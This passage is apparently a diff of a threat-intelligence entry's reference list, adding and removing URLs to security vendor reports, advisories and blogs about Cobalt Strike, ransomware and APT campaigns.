"https://www.fortinet.com/blog/threat-research/nobelium-returns-to-the-political-world-stage",
- "https://www.cynet.com/understanding-squirrelwaffle/",
- "https://blog.cobaltstrike.com/",
- "https://blog.cobaltstrike.com/2021/02/09/learn-pipe-fitting-for-all-of-your-offense-projects/",
- "https://blog.talosintelligence.com/2022/05/mustang-panda-targets-europe.html",
- "https://www.accenture.com/us-en/blogs/cyber-defense/karakurt-threat-mitigation",
- "http://www.secureworks.com/research/threat-profiles/gold-winter",
- "https://orangematter.solarwinds.com/2021/01/11/new-findings-from-our-investigation-of-sunburst/",
- "https://www.advanced-intel.com/post/anatomy-of-attack-inside-bazarbackdoor-to-ryuk-ransomware-one-group-via-cobalt-strike",
- "https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-011/",
- "https://blog.fox-it.com/2021/01/12/abusing-cloud-services-to-fly-under-the-radar/",
- "https://www.cyberark.com/resources/threat-research/analyzing-malware-with-hooks-stomps-and-return-addresses-2",
- "https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/",
- "https://news.sophos.com/en-us/2021/06/02/amsi-bypasses-remain-tricks-of-the-malware-trade/",
- "https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html",
- "https://isc.sans.edu/diary/rss/28664",
- "https://www.wilbursecurity.com/2020/03/trickbot-to-ryuk-in-two-hours/",
- "https://www.cybercom.mil/Media/News/Article/3098856/cyber-national-mission-force-discloses-iocs-from-ukrainian-networks/",
- "https://blog.morphisec.com/log4j-exploit-hits-again-vulnerable-vmware-horizon-servers-at-risk",
- "https://unit42.paloaltonetworks.com/cobalt-strike-metadata-encoding-decoding/",
- "https://twitter.com/AltShiftPrtScn/status/1385103712918642688",
- "https://www.youtube.com/watch?v=GfbxHy6xnbA",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/new-apt-group-chamelgang/#id3",
- "https://haggis-m.medium.com/malleable-c2-profiles-and-you-7c7ab43e7929",
- "https://sergiusechel.medium.com/improving-the-network-based-detection-of-cobalt-strike-c2-servers-in-the-wild-while-reducing-the-6964205f6468",
- "https://www.trendmicro.com/en_in/research/21/k/analyzing-proxyshell-related-incidents-via-trend-micro-managed-x.html",
- "https://blog.google/threat-analysis-group/how-we-protect-users-0-day-attacks/",
- "https://thehackernews.com/2022/05/this-new-fileless-malware-hides.html",
- "https://blogs.blackberry.com/en/2021/10/blackberry-shines-spotlight-on-evolving-cobalt-strike-threat-in-new-book",
- "https://www.cyborgsecurity.com/blog/you-dont-know-the-hafnium-of-it/",
- "https://www.mandiant.com/resources/darkside-affiliate-supply-chain-software-compromise",
- "https://www.0ffset.net/reverse-engineering/malware-analysis/squirrelwaffle-main-loader/",
- "https://elastic.github.io/security-research/intelligence/2022/01/02.collecting-cobalt-strike-beacons/article/",
- "https://blogs.vmware.com/networkvirtualization/2020/11/trick-or-threat-ryuk-ransomware-targets-the-health-care-industry.html/",
- "https://explore.group-ib.com/htct/hi-tech_crime_2018",
- "https://redcanary.com/blog/getsystem-offsec/",
- "https://www.advintel.io/post/advintel-s-state-of-emotet-aka-spmtools-displays-over-million-compromised-machines-through-2022",
- "https://go.recordedfuture.com/hubfs/reports/mtp-2021-0914.pdf",
- "https://www.trendmicro.com/en_us/research/21/i/examining-the-cring-ransomware-techniques.html",
- "https://www.elastic.co/blog/detecting-cobalt-strike-with-memory-signatures",
- "https://blog.cyble.com/2022/05/20/malware-campaign-targets-infosec-community-threat-actor-uses-fake-proof-of-concept-to-deliver-cobalt-strike-beacon/",
- "https://redcanary.com/blog/gootloader",
- "https://www.sekoia.io/en/walking-on-apt31-infrastructure-footprints/",
- "https://news.sophos.com/en-us/2021/09/21/cring-ransomware-group-exploits-ancient-coldfusion-server/?cmp=30728",
- "https://blog.zsec.uk/cobalt-strike-profiles/",
- "https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html",
- "https://us-cert.cisa.gov/ncas/alerts/aa21-265a",
- "https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor",
- "https://www.trendmicro.com/en_us/research/21/g/tracking_cobalt_strike_a_vision_one_investigation.html",
- "https://medium.com/@shabarkin/pointer-hunting-cobalt-strike-globally-a334ac50619a",
- "https://www.splunk.com/en_us/blog/security/you-bet-your-lsass-hunting-lsass-access.html",
- "http://blog.morphisec.com/new-global-attack-on-point-of-sale-systems",
- "https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility",
- "https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-transnaczionalne-zlochinne-ugrupovannya-u-nanesenni-inozemnim-kompaniyam-120-miljoniv-dolariv-zbitkiv/",
- "https://forensicitguy.github.io/analyzing-cactustorch-hta-cobaltstrike/",
- "https://www.mandiant.com/resources/apt41-us-state-governments",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
- "https://michaelkoczwara.medium.com/cobalt-strike-hunting-dll-hijacking-attack-analysis-ffbf8fd66a4e",
- "https://paper.seebug.org/1301/",
- "https://github.com/blackorbird/APT_REPORT/blob/master/Oceanlotus/apt32_report_2019.pdf",
- "https://tccontre.blogspot.com/2019/11/cobaltstrike-beacondll-your-not.html",
- "https://resource.redcanary.com/rs/003-YRU-314/images/2022_ThreatDetectionReport_RedCanary.pdf",
- "https://cyber.wtf/2022/03/23/what-the-packer/",
- "https://twitter.com/AltShiftPrtScn/status/1403707430765273095",
- "https://www.mandiant.com/resources/defining-cobalt-strike-components",
- "https://blogs.blackberry.com/en/2020/12/mountlocker-ransomware-as-a-service-offers-double-extortion-capabilities-to-affiliates",
- "https://www.bleepingcomputer.com/news/security/fake-antivirus-updates-used-to-deploy-cobalt-strike-in-ukraine/",
- "https://elastic.github.io/security-research/intelligence/2022/01/03.extracting-cobalt-strike-beacon/article/",
- "https://thedfirreport.com/2021/07/19/icedid-and-cobalt-strike-vs-antivirus/",
- "https://cert.gov.ua/article/37704",
- "https://malwarebookreports.com/cryptone-cobalt-strike/",
- "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-268a",
- "https://michaelkoczwara.medium.com/mapping-and-pivoting-cobalt-strike-c2-infrastructure-attributed-to-cve-2021-40444-438786fcd68a",
- "https://blog.nviso.eu/2022/03/22/cobalt-strike-overview-part-7/",
- "https://cert.gov.ua/article/339662",
- "https://www.cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot",
- "https://www.istrosec.com/blog/apt-sk-cobalt/",
- "https://cpj.org/2021/02/vietnam-based-hacking-oceanlotus-targets-journalists",
- "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/how-cybercriminals-abuse-cloud-tunneling-services",
- "https://thedfirreport.com/2020/11/05/ryuk-speed-run-2-hours-to-ransom/",
- "https://www.youtube.com/watch?v=gfYswA_Ronw",
- "https://twitter.com/MsftSecIntel/status/1522690116979855360",
- "https://www2.deloitte.com/content/dam/Deloitte/dk/Documents/Grabngo/Aarhus_miniseminar_291118.pdf",
- "https://decoded.avast.io/threatintel/decoding-cobalt-strike-understanding-payloads/",
- "https://www.ironnet.com/blog/ransomware-graphic-blog",
- "https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-LeonSilvia-NextGenPlugXShadowPad.pdf",
- "https://vanmieghem.io/blueprint-for-evading-edr-in-2022/",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/new-apt-group-chamelgang",
- "https://www.lac.co.jp/lacwatch/people/20180521_001638.html",
- "https://blog.talosintelligence.com/2020/06/indigodrop-maldocs-cobalt-strike.html",
- "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html",
- "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout",
- "https://www.justice.gov/opa/pr/justice-department-announces-court-authorized-seizure-domain-names-used-furtherance-spear",
- "https://isc.sans.edu/diary/rss/28448",
- "https://community.riskiq.com/article/0bcefe76",
- "https://twitter.com/th3_protoCOL/status/1433414685299142660?s=20",
- "https://blog.truesec.com/2021/05/05/are-the-notorious-cyber-criminals-evil-corp-actually-russian-spies/",
- "https://blog.lumen.com/zuorat-hijacks-soho-routers-to-silently-stalk-networks/",
- "https://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618",
- "https://blog.talosintelligence.com/2021/05/ctir-case-study.html",
- "https://unit42.paloaltonetworks.com/bumblebee-malware-projector-libra/",
+ "https://kienmanowar.wordpress.com/2021/09/06/quick-analysis-cobaltstrike-loader-and-shellcode/",
+ "https://www.mandiant.com/resources/unc2452-merged-into-apt29",
+ "https://www.welivesecurity.com/2022/04/13/eset-takes-part-global-operation-disrupt-zloader-botnets/",
+ "https://malcat.fr/blog/lnk-forensic-and-config-extraction-of-a-cobalt-strike-beacon/",
+ "https://labs.sentinelone.com/hotcobalt-new-cobalt-strike-dos-vulnerability-that-lets-you-halt-operations/",
+ "https://assets.virustotal.com/reports/2021trends.pdf",
+ "https://research.nccgroup.com/2022/03/31/conti-nuation-methods-and-techniques-observed-in-operations-post-the-leaks/",
+ "https://medium.com/walmartglobaltech/trickbot-crews-new-cobaltstrike-loader-32c72b78e81c",
+ "https://blog.malwarebytes.com/threat-analysis/2020/07/chinese-apt-group-targets-india-and-hong-kong-using-new-variant-of-mgbot-malware/",
+ "https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-drbcontrol-uncovering-a-cyberespionage-campaign-targeting-gambling-companies-in-southeast-asia",
+ "https://cybleinc.com/2020/11/17/oceanlotus-continues-with-its-cyber-espionage-operations/",
+ "https://www.truesec.com/hub/blog/proxyshell-qbot-and-conti-ransomware-combined-in-a-series-of-cyber-attacks",
"https://www.advanced-intel.com/post/front-door-into-bazarbackdoor-stealthy-cybercrime-weapon",
- "https://experience.mandiant.com/trending-evil-2/p/1",
- "https://inteloperator.medium.com/the-default-63-6f-62-61-6c-74-strike-8ac9ee0de1b7",
- "https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_201_haruyama_jp.pdf",
- "https://www.ic3.gov/Media/News/2021/210823.pdf",
- "https://www.mdsec.co.uk/2021/07/investigating-a-suspicious-service/",
- "https://blog.nviso.eu/2021/10/27/cobalt-strike-using-known-private-keys-to-decrypt-traffic-part-2/",
- "https://www.sentinelone.com/blog/hive-ransomware-deploys-novel-ipfuscation-technique/",
- "https://thedfirreport.com/2020/10/08/ryuks-return/",
- "https://www.youtube.com/watch?v=LA-XE5Jy2kU",
- "https://blog.securehat.co.uk/malware-analysis/extracting-the-cobalt-strike-config-from-a-teardrop-loader",
- "https://www.trendmicro.com/en_us/research/20/i/u-s--justice-department-charges-apt41-hackers-over-global-cyberattacks.html",
+ "https://www.arashparsa.com/catching-a-malware-with-no-name/",
+ "https://labs.f-secure.com/blog/detecting-exposed-cobalt-strike-dns-redirectors",
+ "https://blog.reconinfosec.com/analysis-of-exploitation-cve-2020-10189/",
+ "https://blogs.blackberry.com/en/2020/12/mountlocker-ransomware-as-a-service-offers-double-extortion-capabilities-to-affiliates",
+ "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf",
+ "https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-xakerske-ugrupovannya-u-rozpovsyudzhenni-virusu-shifruvalnika-ta-nanesenni-inozemnim-kompaniyam-piv-milyarda-dolariv-zbitkiv/",
+ "https://www.secureworks.com/blog/hades-ransomware-operators-use-distinctive-tactics-and-infrastructure",
+ "https://awakesecurity.com/blog/catching-the-white-stork-in-flight/",
+ "https://twitter.com/redcanary/status/1334224861628039169",
+ "https://thehackernews.com/2022/05/malware-analysis-trickbot.html",
+ "https://www.incibe-cert.es/sites/default/files/contenidos/estudios/doc/incibe-cert_estudio_analisis_nobelium_2022_v1.pdf",
+ "https://www.mandiant.com/resources/defining-cobalt-strike-components",
+ "https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf",
+ "https://blueteamblog.com/darkside-ransomware-operations-preventions-and-detections",
+ "https://www.proofpoint.com/us/blog/threat-insight/nimzaloader-ta800s-new-initial-access-malware",
+ "https://www.inky.com/blog/colonial-pipeline-ransomware-hack-unleashes-flood-of-related-phishing-attempts",
+ "https://www.bleepingcomputer.com/news/security/cisa-updates-conti-ransomware-alert-with-nearly-100-domain-names/",
+ "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-dianxun.pdf",
+ "https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575",
+ "https://www.welivesecurity.com/2021/08/24/sidewalk-may-be-as-dangerous-as-crosswalk/",
+ "https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2",
+ "https://www.prodaft.com/m/reports/WizardSpider_TLPWHITE_v.1.4.pdf",
+ "https://cert.gov.ua/article/619229",
+ "https://blog.cobaltstrike.com/2021/02/09/learn-pipe-fitting-for-all-of-your-offense-projects/",
+ "https://blog.exatrack.com/melofee/",
+ "http://blog.nsfocus.net/murenshark",
+ "https://www.intrinsec.com/proxynotshell-owassrf-merry-xchange/",
+ "https://community.riskiq.com/article/f0320980",
+ "https://www.crowdstrike.com/blog/how-falcon-complete-stopped-a-solarwinds-serv-u-exploit-campaign/",
+ "https://twitter.com/Unit42_Intel/status/1421117403644186629?s=20",
+ "https://decoded.avast.io/luigicamastra/backdoored-client-from-mongolian-ca-monpass",
+ "https://blog.cobaltstrike.com/2020/03/04/cobalt-strike-joins-core-impact-at-helpsystems-llc/",
+ "https://blog.talosintelligence.com/2021/05/ctir-case-study.html",
+ "https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf",
+ "https://thedfirreport.com/2021/06/20/from-word-to-lateral-movement-in-1-hour/",
+ "https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html",
+ "https://us-cert.cisa.gov/ncas/alerts/aa21-265a",
+ "https://www.mandiant.com/resources/russian-targeting-gov-business",
+ "https://blog.securityonion.net/2022/02/quick-malware-analysis-emotet-epoch-5.html",
+ "https://michaelkoczwara.medium.com/cobalt-strike-powershell-payload-analysis-eecf74b3c2f7",
+ "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/542/original/CTIR_casestudy_2.pdf",
+ "https://us-cert.cisa.gov/ncas/alerts/aa21-148a",
+ "https://www.wilbursecurity.com/2020/03/trickbot-to-ryuk-in-two-hours/",
+ "https://attackiq.com/2022/06/03/attack-graph-response-to-us-cert-aa22-152a-karakurt-data-extortion-group/",
+ "https://security.macnica.co.jp/blog/2022/05/iso.html",
+ "https://www.trendmicro.com/en_us/research/21/e/proxylogon-a-coinminer--a-ransomware--and-a-botnet-join-the-part.html",
+ "https://github.com/0xjxd/SquirrelWaffle-From-Maldoc-to-Cobalt-Strike/raw/main/2021-10-02%20-%20SquirrelWaffle%20-%20From%20Maldoc%20to%20Cobalt%20Strike.pdf",
+ "https://go.recordedfuture.com/hubfs/reports/mtp-2021-0914.pdf",
+ "https://labs.sentinelone.com/noblebaron-new-poisoned-installers-could-be-used-in-supply-chain-attacks/",
+ "https://www.proofpoint.com/us/blog/threat-insight/cobalt-strike-favorite-tool-apt-crimeware",
+ "https://www.trustnet.co.il/blog/virus-alert-to-powershell-encrypted-loader/",
+ "https://rastamouse.me/ntlm-relaying-via-cobalt-strike/",
+ "https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-annex-download.pdf",
+ "https://medium.com/walmartglobaltech/from-royal-with-love-88fa05ff7f65",
+ "https://videos.didierstevens.com/2022/09/06/an-obfuscated-beacon-extra-xor-layer/",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2021-0107.pdf",
+ "https://401trg.com/burning-umbrella/ ",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://www.hhs.gov/sites/default/files/bazarloader.pdf",
+ "https://www.zscaler.com/blogs/security-research/squirrelwaffle-new-loader-delivering-cobalt-strike",
+ "https://blog.cyble.com/2022/06/23/matanbuchus-loader-resurfaces/",
+ "https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-LeonSilvia-NextGenPlugXShadowPad.pdf",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/",
+ "https://isc.sans.edu/diary/rss/27176",
+ "https://blog.talosintelligence.com/2022/08/manjusaka-offensive-framework.html",
+ "https://tccontre.blogspot.com/2019/11/cobaltstrike-beacondll-your-not.html",
+ "https://cluster25.io/2022/05/03/a-strange-link-between-a-destructive-malware-and-the-loader-of-a-ransomware-group-isaacwiper-vs-vatet/",
+ "https://news.sophos.com/en-us/2020/10/14/inside-a-new-ryuk-ransomware-attack/",
+ "https://mp.weixin.qq.com/s/cGS8FocPnUdBconLbbaG-g",
+ "https://www.secureworks.com/research/threat-profiles/bronze-mohawk",
+ "https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/",
+ "https://medium.com/cycraft/taiwan-high-tech-ecosystem-targeted-by-foreign-apt-group-5473d2ad8730",
+ "https://bmcder.com/blog/cobalt-strike-dfir-listening-to-the-pipes",
+ "https://www.binarydefense.com/analysis-of-hancitor-when-boring-begets-beacon",
+ "https://www.youtube.com/watch?v=gfYswA_Ronw",
+ "https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html",
+ "https://www.mandiant.com/resources/tracking-apt29-phishing-campaigns",
+ "https://mp.weixin.qq.com/s/peIpPJLt4NuJI1a31S_qbQ",
+ "https://news.sophos.com/en-us/2021/04/21/nearly-half-of-malware-now-use-tls-to-conceal-communications/",
+ "https://blog.talosintelligence.com/2020/06/indigodrop-maldocs-cobalt-strike.html",
+ "https://blog.google/threat-analysis-group/how-we-protect-users-0-day-attacks/",
+ "https://www.secureworks.com/research/threat-profiles/gold-dupont",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/sneak-peek-ch1-2-finding-beacons-in-the-dark.pdf",
"https://unit42.paloaltonetworks.com/bazarloader-network-reconnaissance/",
+ "https://www.youtube.com/watch?v=GfbxHy6xnbA",
+ "https://blog.bushidotoken.net/2022/06/overview-of-russian-gru-and-svr.html",
+ "https://insight-jp.nttsecurity.com/post/102ho8o/operation-restylink",
+ "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/growling-bears-make-thunderous-noise.html",
+ "http://www.secureworks.com/research/threat-profiles/gold-winter",
+ "https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan",
+ "https://forensicitguy.github.io/analyzing-cactustorch-hta-cobaltstrike/",
+ "https://www.telsy.com/download/5972/?uid=d7c082ba55",
+ "https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Tseng-Mem2Img-Memory-Resident-Malware-Detection-via-Convolution-Neural-Network.pdf",
+ "https://www.youtube.com/watch?v=ysN-MqyIN7M",
+ "https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/China/APT/Chimera/Analysis.md",
+ "https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/",
+ "https://www.cybereason.com/blog/threat-analysis-report-from-shatak-emails-to-the-conti-ransomware",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware",
+ "https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html",
+ "https://www.huntress.com/blog/cobalt-strike-analysis-of-obfuscated-malware",
+ "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/",
+ "https://blog.zsec.uk/cobalt-strike-profiles/",
+ "https://blog.macnica.net/blog/2020/11/dtrack.html",
+ "https://www.ironnet.com/blog/tracking-cobalt-strike-servers-used-in-cyberattacks-on-ukraine",
+ "https://ak100117.medium.com/analyzing-cobalt-strike-powershell-payload-64d55ed3521b",
+ "https://unit42.paloaltonetworks.com/hancitor-infections-cobalt-strike/",
+ "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/",
+ "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v",
+ "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html",
+ "https://lab52.io/blog/the-energy-reserves-in-the-eastern-mediterranean-sea-and-a-malicious-campaign-of-apt10-against-turkey/",
+ "https://www.fortinet.com/blog/threat-research/the-year-of-the-wiper",
+ "https://www.cobaltstrike.com/support",
+ "https://www.youtube.com/watch?v=pIXl79IPkLI",
+ "https://cocomelonc.github.io/tutorial/2022/05/09/malware-pers-4.html",
+ "https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/",
+ "https://medium.com/walmartglobaltech/cobaltstrike-stager-utilizing-floating-point-math-9bc13f9b9718",
+ "https://blogs.blackberry.com/en/2021/11/zebra2104",
+ "https://thedfirreport.com/2022/03/07/2021-year-in-review/",
+ "https://www.cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot",
+ "https://www.secureworks.com/research/darktortilla-malware-analysis",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/how-cybercriminals-abuse-cloud-tunneling-services",
+ "https://www.secureworks.com/research/threat-profiles/gold-kingswood",
+ "https://blog.group-ib.com/REvil_RaaS",
+ "https://thedfirreport.com/2022/01/24/cobalt-strike-a-defenders-guide-part-2/",
+ "https://newtonpaul.com/analysing-fileless-malware-cobalt-strike-beacon/",
+ "https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_201_haruyama_jp.pdf",
+ "https://www.advintel.io/post/advintel-s-state-of-emotet-aka-spmtools-displays-over-million-compromised-machines-through-2022",
+ "https://bmcder.com/blog/extracting-cobalt-strike-from-windows-error-reporting",
+ "https://mez0.cc/posts/cobaltstrike-powershell-exec/",
+ "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack",
+ "https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/",
"https://labs.sentinelone.com/inside-a-trickbot-cobaltstrike-attack-server/",
- "https://github.com/swisscom/detections/blob/main/RYUK/cobaltstrike_c2s.txt"
+ "https://blog.prevailion.com/wizard-spider-continues-to-confound-4298370f6903",
+ "https://research.nccgroup.com/2020/06/15/striking-back-at-retired-cobalt-strike-a-look-at-a-legacy-vulnerability/",
+ "https://isc.sans.edu/forums/diary/Qakbot+infection+with+Cobalt+Strike+and+VNC+activity/28448/",
+ "https://www.contextis.com/en/blog/dll-search-order-hijacking",
+ "https://www.sentinelone.com/blog/from-the-front-lines-peering-into-a-pysa-ransomware-attack/",
+ "https://www.trustedsec.com/blog/tailoring-cobalt-strike-on-target/",
+ "https://blogs.blackberry.com/en/2022/01/log4u-shell4me",
+ "https://ics-cert.kaspersky.com/publications/reports/2022/06/27/attacks-on-industrial-control-systems-using-shadowpad/",
+ "https://www.huntress.com/blog/cybersecurity-advisory-vmware-horizon-servers-actively-being-hit-with-cobalt-strike",
+ "https://www.microsoft.com/security/blog/2021/09/15/analyzing-attacks-that-exploit-the-mshtml-cve-2021-40444-vulnerability/",
+ "https://michaelkoczwara.medium.com/cobalt-strike-hunting-dll-hijacking-attack-analysis-ffbf8fd66a4e",
+ "https://www.trendmicro.com/en_us/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict.html",
+ "https://www.trendmicro.com/en_us/research/21/k/Squirrelwaffle-Exploits-ProxyShell-and-ProxyLogon-to-Hijack-Email-Chains.html",
+ "https://blog.nviso.eu/2021/04/26/anatomy-of-cobalt-strike-dll-stagers/",
+ "https://medium.com/cycraft/china-linked-threat-group-targets-taiwan-critical-infrastructure-smokescreen-ransomware-c2a155aa53d5",
+ "https://blog.talosintelligence.com/2022/05/mustang-panda-targets-europe.html",
+ "https://medium.com/walmartglobaltech/investigation-into-the-state-of-nim-malware-14cc543af811",
+ "https://blog.truesec.com/2020/12/22/collaboration-between-fin7-and-the-ryuk-group-a-truesec-investigation/",
+ "https://www.esentire.com/blog/icedid-to-cobalt-strike-in-under-20-minutes",
+ "https://teamt5.org/en/posts/hiding-in-plain-sight-obscuring-c2s-by-abusing-cdn-services",
+ "https://blog.talosintelligence.com/2020/09/CTIR-quarterly-trends-Q4-2020.html",
+ "https://intel471.com/blog/shipping-companies-ransomware-credentials",
+ "https://twitter.com/vikas891/status/1385306823662587905",
+ "https://content.fireeye.com/m-trends/rpt-m-trends-2020",
+ "https://github.com/sophos-cybersecurity/solarwinds-threathunt",
+ "https://shells.systems/in-memory-shellcode-decoding-to-evade-avs/",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf",
+ "https://www.recordedfuture.com/solardeflection-c2-infrastructure-used-by-nobelium-in-company-brand-misuse/",
+ "https://www.cynet.com/orion-threat-alert-flight-of-the-bumblebee/",
+ "https://experience.mandiant.com/trending-evil-2/p/1",
+ "https://github.com/Sentinel-One/CobaltStrikeParser/blob/master/parse_beacon_config.py",
+ "https://www.youtube.com/watch?v=XfUTpwZKCDU",
+ "https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/",
+ "https://isc.sans.edu/diary/rss/27618",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-011.pdf",
+ "https://stillu.cc/threat-spotlight/2021/11/13/domain-fronting-fastly/",
+ "https://www.youtube.com/watch?v=LA-XE5Jy2kU",
+ "https://blog.malwarebytes.com/threat-intelligence/2021/11/a-multi-stage-powershell-based-attack-targets-kazakhstan/",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2022-0503.pdf",
+ "https://github.com/swisscom/detections/blob/main/RYUK/cobaltstrike_c2s.txt",
+ "https://news.sophos.com/en-us/2022/02/23/dridex-bots-deliver-entropy-ransomware-in-recent-attacks/",
+ "https://isc.sans.edu/diary/Bumblebee+Malware+from+TransferXL+URLs/28664",
+ "https://netresec.com/?b=214d7ff",
+ "https://www.inde.nz/blog/different-kind-of-zoombomb",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2022-0118.pdf",
+ "https://asec.ahnlab.com/ko/19860/",
+ "https://www.guidepointsecurity.com/blog/a-ransomware-near-miss-proxyshell-a-rat-and-cobalt-strike/",
+ "https://www.cynet.com/understanding-squirrelwaffle/",
+ "https://paper.seebug.org/1301/",
+ "https://www.wired.com/story/russias-fancy-bear-hack-us-federal-agency/",
+ "https://www.accenture.com/us-en/blogs/cyber-defense/double-extortion-campaigns",
+ "https://thedfirreport.com/2021/06/28/hancitor-continues-to-push-cobalt-strike/",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war",
+ "https://www.istrosec.com/blog/apt-sk-cobalt/",
+ "https://isc.sans.edu/diary/rss/28934",
+ "https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-transnaczionalne-zlochinne-ugrupovannya-u-nanesenni-inozemnim-kompaniyam-120-miljoniv-dolariv-zbitkiv/",
+ "https://dansec.medium.com/detecting-malicious-c2-activity-spawnas-smb-lateral-movement-in-cobaltstrike-9d518e68b64",
+ "https://documents.trendmicro.com/assets/white_papers/wp-earth-baku-an-apt-group-targeting-indo-pacific-countries.pdf",
+ "https://www.accenture.com/us-en/blogs/security/ransomware-hades",
+ "https://news.sophos.com/en-us/2021/05/07/new-lemon-duck-variants-exploiting-microsoft-exchange-server/?cmp=30728",
+ "https://sixdub.medium.com/using-kaitai-to-parse-cobalt-strike-beacon-configs-f5f0552d5a6e",
+ "https://www.picussecurity.com/resource/blog/ttps-used-in-the-solarwinds-breach",
+ "https://cocomelonc.github.io/malware/2022/09/06/malware-tricks-23.html",
+ "https://securelist.com/apt-trends-report-q3-2020/99204/",
+ "https://www.advintel.io/post/anatomy-of-attack-truth-behind-the-costa-rica-government-ransomware-5-day-intrusion",
+ "http://blog.morphisec.com/new-global-attack-on-point-of-sale-systems",
+ "https://blog.talosintelligence.com/2022/06/avoslocker-new-arsenal.html",
+ "https://www2.deloitte.com/content/dam/Deloitte/dk/Documents/Grabngo/Aarhus_miniseminar_291118.pdf",
+ "https://blog.talosintelligence.com/2021/10/squirrelwaffle-emerges.html",
+ "https://www.justice.gov/opa/pr/justice-department-announces-court-authorized-seizure-domain-names-used-furtherance-spear",
+ "https://www.advintel.io/post/blackcat-in-a-shifting-threat-landscape-it-helps-to-land-on-your-feet-tech-dive",
+ "https://news.sophos.com/en-us/2021/10/04/atom-silo-ransomware-actors-use-confluence-exploit-dll-side-load-for-stealthy-attack/",
+ "https://www.cybereason.com/blog/threat-analysis-report-datoploader-exploits-proxyshell-to-deliver-qbot-and-cobalt-strike",
+ "https://blog.nviso.eu/2021/10/21/cobalt-strike-using-known-private-keys-to-decrypt-traffic-part-1/",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf",
